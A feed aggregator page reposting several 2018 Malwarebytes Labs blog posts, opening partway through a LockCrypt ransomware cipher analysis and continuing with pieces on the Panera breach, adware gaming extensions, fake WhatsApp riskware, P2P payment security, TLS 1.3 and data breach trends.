It reads the registry to check if it was already deployed. Finding the appropriate keys can stop the infection—the malware will recognize the machine as already attacked. Otherwise, it will proceed further.


The infection starts from the attempt to communicate with the CnC.

Looking inside this function, we could now understand the role of the mysterious buffer of bytes seen during the behavioral analysis. The downloaded buffer is validated by its CRC32 checksum. Then, it sets in a global variable for the further use of the encryption routine.

It turns out that this buffer is like a pad used for the encryption schema. The authors probably wanted to achieve something like a one-time-pad encryption. However, they reused the buffer, and because of this, they made their algorithm vulnerable for a plain text attack.

If for some reason downloading the buffer from the Internet is not possible, it is generated by a simple, pseudo-random algorithm:

The authors did not make the best choice for the random generator. Rather than using a cryptographically strong one, they went for the GetTickCount function.

Looking inside the encryption routine, we can see that the file is scrambled by a pretty simple function:

The scrambling algorithm has two different rounds. The reconstructed code of both rounds can be seen below.

Round 1 .gist table { margin-bottom: 0; }

This round uses only XOR operation, but there is a twist that prevents you from recovering the original key. Although the DWORD from the input is XORed with a DWORD from the key, the input is also tainted with the previous output. On every step, the first half of the input DWORD is taken from the previous output, while only the second half is fresh. That makes it a simple stream cipher.

Round 2 .gist table { margin-bottom: 0; }

This round looks more complicated—Not only is XOR operation used here, but also ROL and bitwise swap. However, there is no input tainting this time, so it is easily reversible.

Those two simple rounds, together with the “pad” buffer that is 2,500 bytes long, were able to generate the output with pretty high entropy.

File names obfuscation

The names of the files are first XORed with the pad buffer, and then base64 encoded. The offset of the XOR key is 1111 characters from the beginning of the buffer.

The part of code responsible for this:


LockCrypt is an example of yet another simple ransomware created and used by unsophisticated attackers. Its authors ignored well-known guidelines about the proper use of cryptography. The internal structure of the application is also unprofessional.

Sloppy, unprofessional code is pretty commonplace when ransomware is created for manual distribution. Authors don’t take much time preparing the attack or the payload. Instead, they’re rather focused on a fast and easy gain, rather than on creating something for the long run. Because of this, they could easily be defeated.

The post LockCrypt ransomware: weakness in code can lead to recovery appeared first on Malwarebytes Labs.

Categories: Techie Feeds breach could have impacted millions

Malwarebytes - Tue, 04/03/2018 - 20:53

Customers who signed up for a account in order to order fast-casual baked goods may want to guard their dough. Security researcher Brian Krebs reported yesterday that the website for the bakery chain leaked millions of customer records, including names, emails, physical addresses, birthdays, and the last four digits of customers’ credit card numbers.

Until Monday, millions of customer data points were accessible on the site as plain text—an oversight that Krebs maintains left data exposed for at least eight months. While Panera was contacted by security researcher Dylan Houlihan back in August 2017 about the leak, it appears they did not take action to fix it, despite reassurances they were working on a resolution.

Once Krebs notified Panera about the breach, the company took its website offline for a brief period of time. When the site came back online, the customer data was no longer available.

Panera issued statements to the press that they moved to fix the breach hours after Krebs reached out to them, though they didn’t address the eight-month gap in action from their first notification. In addition, they stated that only 10,000 customer records were exposed, though researcher HoldSecurity claims it’s more like 37 million.

While this story is still developing, we urge our readers to take necessary precautions to protect their data. An unprecedented season of breaches in 2017 gave way to more breach discoveries in early 2018, with companies such as Orbitz, Lord & Taylor/Saks Fifth Avenue, and MyFitnessPal collectively exposing more than 155 million users.

Recognize that while the flood of data breaches in itself is alarming, we still haven’t seen the full potential for the consequences of giving such valuable data freely to the black market. As tax season comes to a close, for example, we may be poised for a deluge of fraudulent claims and identity theft as criminals try to cash in on their data. Because of this, we suggest taking similar steps as after the Equifax breach, which includes monitoring credit reports, staying on high alert for email, phone, or text scams, and enabling alerts on your accounts.

The more we see infringements of the size and proportion of the breach, the more we caution users to just assume their data has been compromised. Right now, the best we can do—until companies buckle down harder on security and privacy protocols—is to caution everyone to protect their data from being used to harm them.

Stay safe, everyone.

The post breach could have impacted millions appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malicious gaming extensions: a child’s play to infection

Malwarebytes - Tue, 04/03/2018 - 15:30

Did you ever lend your laptop to a child to play a video game, only to get it back filled with advertisements? Our CEO knows a little bit about that predicament, having unknowingly infected his parents’ computer when he was a kid. But times have changed since then.

Let us play for you a modern-day scenario, then, to show how it’s a short trip from “I want to play this game” to “Hey, there’s adware on my laptop!”

How to get infected playing a video game

These days the coolest kids at school aren’t playing football—they’re playing video games. Of course, your kid wants to be the best in a popular game like So he grabs the family laptop and does a search for “always win slither.”

Look at the top search result: a YouTube video by a well-known YouTuber named Jelly, who has 7,866,496 subscribers tuning into his gaming channel. If you were a gaming portal, would you think it’s worth the investment to pay AdChoices to get a relevant advertisement on that page?

Well-placed advertising always pays off.

With its prominence and high potential for pay-off, the answer is decidedly “yes,” especially if your intentions are less than ethical. Normally, the game is free to play, but who is going to stop you from creating a landing page that says you have to install this browser extension before you can play?

Advertising networks certainly won’t. In order to advertise online, businesses must merely sign up with a network and then bid in real time to have their ads appear on popular websites. However, not all advertising networks have strict criteria for advertisers—ad sellers don’t always know the buyers. Not only that, but buying advertising space is increasingly being transacted automatically, which leaves the door open for further mischief.

Install the extension, even though the game is completely free, why don’t you?

So, back to our kid. Remember, he just learned how to beat all his friends, so he’s eager to get going. He downloads the extension at the upper right-hand side of the screen because it’s the closest thing resembling a “play” button. What harm is a little extension going to do?

All it can do is “Read and change all your data on the websites you visit,” after all.

Wait, what?

Yes, it knows which websites you visit, gathering all the data about your surfing behavior. And yes, it can use that information to insert relevant advertisements on those sites. And unfortunately, that’s exactly what these extensions do. So we have a question for your kid, who’s about to install this extension on your laptop:

Do you treat advertisements on the site of your favorite gaming portal with the same level of trust as the ones on a random Facebook page? Or do you trust one site’s ads over the other?

If the answer isn’t clear here, then we might need to supply further instruction on the psychology behind successful marketing: The power to insert advertisements on sites that your target audience trusts is a desirable one—one that cybercriminals would gladly pay for.

And pay they did, aiming their advertising campaigns at games that attract a relatively young audience, including, HappyWheels,, Subway Surfers, MineCraft, and BlockWorld, among others.

What does the malicious browser extension actually do?

Now that the line of infection is clear, let’s talk numbers.

Because their advertising landing pages are so prominent and well-placed, gaming extensions bring in a lot of traffic to Chrome’s Webstore. The GamerSuperstar extension, for example, has been installed almost 100,000 times.

If you download the extension directly from Webstore, you probably have a better idea of what its capabilities and permissions are by scrolling through the product descriptions and reading user reviews. This is not true, however, if you just click prompts from an advertising landing page. And that’s how these criminals pull the wool over users’ eyes, getting thousands to download without realizing what they are getting into.

And what they’re getting into is a whole lotta adware.

The extension does absolutely nothing to change the gameplay—it’s completely unnecessary. All you gain by installing most of these extensions is targeted advertising on the sites you visit. A select few also alter your search and newtab settings.

ArcadeTab comes with a search newtab

Other malicious gaming extensions

I wish we could say that GamerSuperStar was the only example of a malicious gaming extension that we have come across. Over the last few months, however, we’ve tracked quite a few of them.

  • Search Web by 1 million+ installs (and this one also qualifies as a search and newtab hijacker)
  • ArcadeFrontier Ads by 150,000+ installs
  • GamesChill Ads by 100,000+ installs
  • PlayZiz Advertisements by 40,000+ installs
  • Gamerscan Ad by 25,000+ installs
  • ArcadeGala Advertising Offers by 5,000+ installs
  • VideoGameHub Advertising by 1,500+ installs

One note about the above: Data for Chrome extensions are a lot easier to track down because of their Webstore listing. We know there are Firefox and Safari extensions as well, but we can only guess at the numbers for Firefox and Safari extensions that were installed.

So these other extensions—no way they could be more aggressive on permissions than GamerSuperStar, right? Wrong. It was among the least demanding extension of its kind.

This was the most demanding extension permissions list we saw.

Remediating the infection

Although thousands of people were fooled into downloading these data-gathering extensions, it’s easy enough to get rid of them. If you look at the uninstall page for GamerSuperStar on Chrome, you can see there are removal instructions for Firefox and Safari extensions as well.

In addition, Malwarebytes can block many of these kinds of extensions from being downloaded in the first place, since they fetch their advertisements from the servers, which have been at the top of our block list consistently for the last few weeks.

The paid version of Malwarebytes blocks the domain

Malwarebytes also detects the extensions involved. Most of them are under the generic detection name Adware.Cmptch.Generic. You can find a removal guide for GamerSuperstar and a ArcadeTab on our forums.

Caught red-handed

The common pattern that we found for all these extensions is that they advertise their gaming portal heavily, and when clicking on the ads to arrive at the portal, you will instead be prompted to install an extension before you can play. If you visit the portal directly, however, you can jump straight in and start playing without being bothered.

Even though it’s hard to prove that these extensions are all coming from the same source, the similarities between the ways in which they are pushed and their target audience make us believe that they are at least closely-related. We also found similar domains and extensions acting suspiciously, but since we didn’t catch them in the act, we will not list them here.

But rest assured…we’re keeping an eye on them.


Chrome extensions:

obpnlclobfjomjabiibfnbfmebenjedp peglehonblabfemopkgmfcpofbchegcl dehhfjanlmglmabomenmpjnnopigplae anaojjlbaalfefdgonnpmcpgpeafkdig eogmpgppidehapppmipeahegomlindkg piblbljcjideclibhpjobcaakomfcdnf kfljkfcdekakneakneabhomcpmgfpbdc flpdiedhjcapelfbeffompkoeilgmkhm

Firefox extension:



The post Malicious gaming extensions: a child’s play to infection appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: Fake WhatsApp can steal info from your phone

Malwarebytes - Mon, 04/02/2018 - 17:00

Last month, a blogger at My Online Security reported receiving a spam comment containing WhatsApp Plus. Going through the process, they downloaded an APK of this so-called WhatsApp Plus. Where they ended was as stated,

I am not certain exactly what this does, but from the sandbox reports it looks like it has the potential to steal information, photos, phone numbers etc from your mobile phone.  

Indeed, they are correct, as this is a variant of Android/PUP.Riskware.Wtaspin.GB, a Fake WhatsApp riskware that dates back to mid-2017.  But what makes this variant unique is where it leads us.

Whats in a Fake WhatsApp?

As our dear My Online Security blogger did, I too went through the process and downloaded/installed the APK aforementioned in the linked blog. Upon opening the app is the following greeting:

Of special interest is the gold logo in the middle with a URL and handle. Onward, I clicked on AGREE AND CONTINUE to find, oh no, I was out of date!

The message states, Please go to Google Play Store to download latest version — nah, I’d rather click the DOWNLOAD button. Where I was redirected was intriguing.

Into another realm of Fake WhatsApp

Where I landed was on the above URL from the shiny gold logo. Everything on the webpage is written in Arabic.

Here I was on the official website to download Watts Plus Plus WhatsApp—that unusual name could very well be an awkward Google translate, by the way.  Among numerous ads (a developer needs to make some ad revenue after all) was text explaining this developer’s WhatsApp version. Below is the (very) rough translation, with minor condensing to the most pertinent information:

What is Watts Plus Plus Whatsapp Plus?

Is a copy of WattsPlus developed by Abu, there may be no confidence in some users in the download of Whatsapp Plus, but this version has been checked files Wats through special programs and the result is positive is safe , and the version of Watts Plus is updated Abu periodically for the  last issue is a special version of the fans of Watts AP Plus:

Secure:  The antivirus software code has been checked, the Watsp files are encrypted in the Watspec servers and cannot be decrypted and can only be decrypted by Wattsp itself.

Updated to the latest version:  Watts August the company issued almost every two days a simple update, and is almost updated copies of our own every two months periodically until the copies contain only critical updates.

Four numbers in the same phone: In this version you can run up to four numbers in the same phone without a routine or any difficulty


Hide the last appearance of friends completely with the property of hiding the reading and reception, and the disappearance of the current writing and running and hide that you have played a clip and your voice. And hide that you watched the case of your friend (Alasturi).

The possibility of changing the program line completely to many of the ready lines

Provides the security feature of the application by placing a secret number cannot open the application without it.

Provides security for conversations by placing a secret number cannot open the conversation without him.

You can send more than 100 photos at once to your friends.

And many other features

Hide what you saw the situation:  You can in the latest version of WhatsApp + WhatsApp Plus WhatSapp Plus AbuSamad AlRifa’i Hide that you watched the status of friends from privacy options from the top menu.

What is the best feature in WhatsApp Plus WhatsApp Plus What isApp Plus Abu Sadam Rifai  If we activate this option, no one will be able to see you online forever and will not show the date of your last appearance and no one will know you are online even while you are on the wattage .

Hide the second health:  The sender of the messages will not be able to tell you that you received the message.

Hides the blue ones:  The sender cannot tell you that you read the message but in return you know that he has read the messages and only shows you the blue ones.

Hide the current writing:  You can also in the new version and the latest version of WhatsApp + WhatsApp Plus whatsapp plus Abu Saddam Al – Rifai  hide hiding or typing on the other end of the conversation.

Hides recording:  When recording a track.

Hide playback signal:  ie, the sender cannot tell you have listened to the audio track.

Two-way operation:  You can run two versions of Wattsp on one device without a router by downloading Watts 1 and Watts 2.

See the status of people without entering the conversation:  You can see the status of people connected or last seen from the main screen of the program.

What stood out to me was all the abilities to hide oneself in various ways—very spy-like behavior.

Onward to the next version

Sifting through all the ads stating they were the download button, I finally came across the true download link. After updating, I once again came to the same screen shown above with the gold logo. This time, after pressing the AGREE AND CONTINUE button, the next screen asked to verify a phone number.

After doing so, a changelog appeared with fixes to the app’s hiding features.

Click to view slideshow.

Clicking OK to the changelog, what appears to be a functioning version of WhatsApp opens.

Click to view slideshow. WhatsCode…ur…what’s in the code

The incriminating code of Android/PUP.Riskware.Wtaspin.GB is within receivers, services, and activities starting with This code is in various fake WhatsApp APKs. The only difference of the aforementioned version from above is the code points to the Arabic webpage to update.

After analyzing several different versions of PUP.Riskware.Wtaspin.GB, it appears all have different URLs from which to update. Thus, everyone is just copy catting the original source code and adding their own “update” website. So, who is the original author of this riskware? Is the Arabic developer, Abu, the originating author?

The code of this riskware is complex. The webpage of the developer claiming to be owner—not so complex. Although I won’t completely rule out the possibility, let’s just say I am skeptical.

No matter the true author or origin of this fake Whatsapp, I suggest sticking with the real WhatsApp on Google Play. Although Google Play has its faults, it’s tremendously safer than some of the sources I came across researching this riskware. Stay safe out there!

The post Mobile Menace Monday: Fake WhatsApp can steal info from your phone appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (March 26 – April 01)

Malwarebytes - Mon, 04/02/2018 - 16:03

Last week, we looked at the thought process behind creating a ransomware decryptor, the inner workings of QuantLoader, the ways one can protect their Android devices, the exploit kits we have encountered this winter, the now-known epidemic of data breaches, the coming of TLS 1.3, and the ways one can protect their P2P payment apps.

Other news
  • “Lone wolf” sextortionists pose as hot women behind fake Facebook profiles. (Source: Sophos’s Naked Security Blog)
  • Sad fact: Willing victims of romance scams actually do exist. Not only do they send money to “their partner” whom they haven’t met yet but they also knowingly act as mules. (Source: Security Week)
  • While a majority of IT pros recognize that IoTs are so insecure, not that many are actually doing anything about it. (Source: ZDNet)
  • What happens when you send an application into the background? This SANS diary attempts to answer that. (Source: SANS ISC InfoSec Forums)
  • Well, will you look at that—Monero isn’t that untraceable after all. (Source: Wired)
  • A flaw in the iOS camera application with the way it handles QR codes can be used to redirect users to malicious destinations. (Source: HackRead)
  • Cryptojacking via browsers has been around for a while, and it’s getting more difficult to spot them. (Source: Bleeping Computer)
  • Tax season is getting really close, so scams surrounding this are active with varying payloads. (Source: Proofpoint Blog)
  • As it happens, Under Armor has left some areas uncovered, causing MyFitnessPal to be compromised and affecting 150 million accounts. (Source: The Verge)
  • ‘Cyber bullets’? Cyber bullets! (Source: Fifth Domain)

Stay safe, everyone!

The post A week in security (March 26 – April 01) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

You down with P2P? 10 tips to secure your mobile payment app

Malwarebytes - Fri, 03/30/2018 - 16:00

If you look at the figures, you cannot deny that the eCommerce industry is steadily growing. More and more people are doing their shopping online, not only for products and services geared toward the use of technologies and the Internet, but also for items previously only found in brick and mortar stores—groceries, clothing, and, of course, books.

But within the eCommerce market, a submarket is springing to life. Mobile payment, in particular, appears to be making its way to mainstream adoption in certain parts of the globe. So how does it work? And how can we make sure our mobile transactions, just as our other online payments, are secure?

Mobile payment methods

Mobile payment is a regulated digital transaction that uses mainly smartphone devices to pay for goods and/or services. This kind of undertaking is supported by apps that act as mobile wallets, which are tied to users’ bank accounts.

There are many forms of mobile payment in use today. In countries like South Korea, Japan, Poland, and Romania, the use of direct mobile billing (also called “direct to bill”) is the norm. SMS payments, which charities use to get people to donate, QR code payments, mobile web or Wireless Application Protocol (WAP) payments, and Near Field Communication (NFC) payments are other examples.

Perhaps the most notable form of mobile payment that has shown growth and popularity across generations, especially among younger Americans, is peer-to-peer or person-to-person (P2P) payment. This method, which can also be used on desktop and laptop devices, allows people to send and receive money to and from a friend or family member. (Splitting restaurant tabs and house bills among people in your circle has never been easier.) PayPal, Square Cash, and Venmo are just some of the apps that offer P2P services. Google, Facebook, and Snapchat have also jumped on the bandwagon.

You may wonder: Why is P2P being adapted so quickly and widely? According to Bank of America’s 2017 Trends in Mobility Consumer Report [PDF], convenience and time saving are the primary motivators for adoption, followed by peer influence.

Trust (and security) issues with P2P apps

Using a P2P payment app is like having a fast, always-on-call middleman. But, like any other app, it is not without its security and privacy issues.

In 2015, mobile app security and analytics company Bluebox Security (now part of Lookout) published a report revealing that security in mobile payment apps is surprisingly not as robust as one might expect. For example, the top two P2P payment apps they analyzed only use basic security protocols. They also found that these apps were vulnerable to tampering and exploitation of code libraries. Furthermore, user information in the app, along with authentication info and transaction history, are visible should threat actors successfully gain access either to the app or to the smartphone device.

While addressing security and privacy concerns surrounding P2P apps rests in the hands of the companies offering these services, users must for now play their part in securing their personal information and banking details.

Living life with P2P (yeah you know me)

Risks are always present in devices and online services we’ve grown to rely on. To a degree, their presence shouldn’t be our only basis for making informed decisions. If using a P2P payment service is unavoidable because your family or friends use it, we can help you navigate through the process of deciding which app may be a good fit for you—bearing privacy and security in mind—so you won’t have to worry much about it in the future:

1. Look into the P2P app your friends and/or family are using. It’s effortless and practical to just go with the same app they use. Now may be good as good a time as any to do your own research on whether their app has the security and privacy features you’re after (e.g., multi-factor authentication).

Remember that no two P2P apps are alike. If you’re not satisfied with their app (e.g., the fee for sending and receiving money isn’t sound, or user data isn’t encrypted), you can jot down those you’re happy to suggest to them instead. You might even convince them to use an alternative app. Start a conversation by sharing your thoughts and findings and hearing theirs.

2. Download only the legitimate P2P payment apps. Regardless of your app of choice, users should always download them from recognized and legitimate mobile app markets like Google Play and the Apple App Store. Banks and other private organizations (like Starbucks) who offer a P2P service also have links to their apps on their websites that users can access.

3. Carefully review the app’s terms of service (ToS) before signing up. In particular, look for the sections on how they settle dispute and complaints and how your information is used, stored, and processed. This should be stated clearly (especially now, as transparency is part of GDPR compliance). It takes time to review and digest the ToS, yes, but it’s always better to take a little extra time up front to save yourself the headache later.

Read: Make way for the GDPR: Is your business ready?

4. Don’t settle for the default. Some P2P payment apps have pre-set security privacy settings, and a majority of users don’t take the time to review them. Ideally, users should crank up these settings to the highest to achieve maximum security and privacy. Also, make sure you enable notifications for any transactions made under your account and any changes to your details or credentials to clue you into potential events of fraud.

5. Favor bank accounts over or non-bank ones. One can tie in their P2P payment app to banks, credit cards, and non-bank financial institution (NBFI) accounts. However, the Federal Deposit Insurance Corporation (FDIC) has advised that it’s best for P2P users to tie their checking accounts or credit cards with their app, so they are insured if something goes horribly wrong. User funds lost or stolen from non-bank institutions may not be legally protected at all.

6. Set up a password to access your P2P app. Not all P2P apps have this feature, but if yours does, lock it up with a PIN or password. This’ll give anyone a difficult time getting your money from the app should you misplace or lose your phone.

7. Set your account to private. Some P2P service providers included a social networking feature in the app where one can see transactions and activities from contacts in the app’s feed. Not the best idea to make those public. Setting your account to private will prevent anyone from following your activities in their feed.

8. Avoid sending money to and receiving from people outside your circle. This mainly applies to the buyer-seller dynamic. A buyer (or scammer) may likely cancel the P2P transaction after receiving the product bought and before their money is debited from their account. This is called a transaction reversal scam.

9. Avoid carrying a balance. Some P2P services allow you to keep a certain amount of money stashed away to a P2P account for an indefinite length of time, like having a digital wallet. Admittedly, this is super convenient; however, it is not as safe as having money in your bank. If money launderers are able to siphon out money from your stash, it’s highly unlikely you’ll get it all back, as a majority of P2P services aren’t FDIC insured.

So if and when you receive money from someone, cash it out immediately, if possible, or move it to a digital wallet like Google Wallet, which has fraud protection in place.

10. (Optional) Open a separate account you can exclusively tie to your P2P payment app. First-time investors are usually advised to not put all their eggs in one basket. In this case, one should consider setting aside a certain number of eggs they would need for P2P transactions.

And let’s not forget…

Keeping your smartphone secure adds a layer of protection to the data and apps it holds. Does your phone have a lock? The majority of smartphone users don’t typically lock their devices, making such devices easier to access if stolen. Set up a lock now. While you’re at it, make your PIN more challenging. (No, 1-2-3-4 is not a good PIN.) Also, be wary of shoulder surfers when opening your phone to use your P2P payment app.

Now that you’re using a P2P service, you should start proactively monitoring your account regularly for unusual activity, the same way you’d do with your actual bank account or credit card. And finally, install mobile security software and tracking software with remote wipe features if you haven’t already.

Adhering to these steps won’t necessarily keep all P2P payment app security and privacy issues at bay. However, in an age when digital threats are sophisticated and scammers are astute, a device can never be too secure, and their owners never too careful.

Stay safe!

The post You down with P2P? 10 tips to secure your mobile payment app appeared first on Malwarebytes Labs.

Categories: Techie Feeds

TLS 1.3 is nearly here

Malwarebytes - Fri, 03/30/2018 - 15:00

TLS stands for “Transport Layer Security” and it’s rather important. Why’s that? Oh, I’m glad you asked. Here’s me, yelling my password across the office to you:


You heard me loud and clear, right? But so did basically anyone else nearby. Now let’s work in a little TLS love and attention, and yell again:

“Large pile of nonsense where the password should be!”

Wow! What happened? Imagine my endlessly yelled password is available to really clever people, uh, standing outside my window listening in. Imagine someone soundproofed said room to enable continued, secure, password yelling. I can yell “Password!” at you all day long, and all anyone else will hear is garbage.

That, in a roundabout “analogy crashing to the ground” sort of way, is TLS. It’s a cryptographic protocol that keeps your communications secure as they make their way from point A to point B. It’s very hard to intercept, listen in, or crack.

Here comes TLS 1.3

SSL—Secure Socket Layer—came about in 1995 with version 2.0, courtesy of Netscape. Over the years, it slowly morphed into something else, becoming TLS in 1999. After more alterations and updates, TLS 1.2 came about in 2008, and we’ve been running with it ever since.

Now, after four years of work and 28 revisions, TLS 1.3 is almost ready to make its debut. This new version makes alterations to how HTTPs connections work, and the Internet Engineering Task Force have stated that it “…will enable client and server applications to communicate over the Internet in a way that is designed to prevent eavesdropping, tampering, and message forgery.”

Bad news for scammers, and quite possibly also for high-level law enforcement operatives with a hand in computer-based digital observation. Outdated encryption is also out the window, with TLS 1.3 consigning long-term broken forms of encryption to the dustbin.

What’s changing with TLS

Here’s a short selection of alterations from the TLS Wiki page, and as you can see, there’s a fair bit of functionality being stripped out to make way for the new revisions:

  • Removing support for weak and lesser-used named elliptic curves (see elliptic-curve cryptography)
  • Removing support for MD5 and SHA-224 cryptographic hash functions
  • Requiring digital signatures even when a previous configuration is used
  • Integrating HKDF and the semi-ephemeral DH proposal
  • Replacing resumption with PSK and tickets
  • Supporting 1-RTT handshakes and initial support for 0-RTT (see round-trip delay time)
  • Dropping support for many insecure or obsolete features, including compression, renegotiation, non-AEAD ciphers, static RSA and static DH key exchange, custom DHE groups, point format negotiation, Change Cipher Spec protocol, Hello message UNIX time, and the length field AD input to AEAD ciphers

Indeed, one of the biggest problems caused by this new set of comprehensive changes are those faced by financial institutions, and anyone dealing with regulatory compliance. Due to how the new setup works, it’ll be harder for them to inspect traffic on their networks and see what’s taking place. There’s also the potential for technical flaws causing some major headaches, as is evidenced by the spectacular bricking of 50,000 Chromebooks last year after an update was applied.

Despite the inevitable teething problems, ultimately this is good news for most of us, with the exception of a few organisations who’ll have to find new ways to work with it. Hopefully, a stronger set of security protocols with TLS 1.3 will result in a very big headache for people dabbling in mischief.

The post TLS 1.3 is nearly here appeared first on Malwarebytes Labs.

Categories: Techie Feeds

The data breach epidemic: no info is safe

Malwarebytes - Thu, 03/29/2018 - 16:00

By now it’s obvious that data security technology and protocols haven’t kept pace with the needs of consumers. Even as more people trust their most sensitive personal information to online apps and services, databases are routinely exposed. In 2017 alone, we learned about massive data breaches from major organizations like Equifax, Uber, and Verizon.

In other words: We’re in the midst of a data breach epidemic.

How bad is it? To help better understand the leaky state of data, TruthFinder created this infographic based on data from the Identity Theft Center. In 2005, there were 157 publicly-reported data breaches of sensitive information. By 2017, that number increased tenfold to 1,579 data breaches.

The severity of breaches is increasing, too. The first breach that leaked over 1 million credit card numbers occurred in 2005, but now we hear about breaches that expose tens or hundreds of millions of records every few months.

Check out TruthFinder’s infographic below. It provides an idea of the serious challenge that security professionals face as they work to turn the tide and secure personal information.


The post The data breach epidemic: no info is safe appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds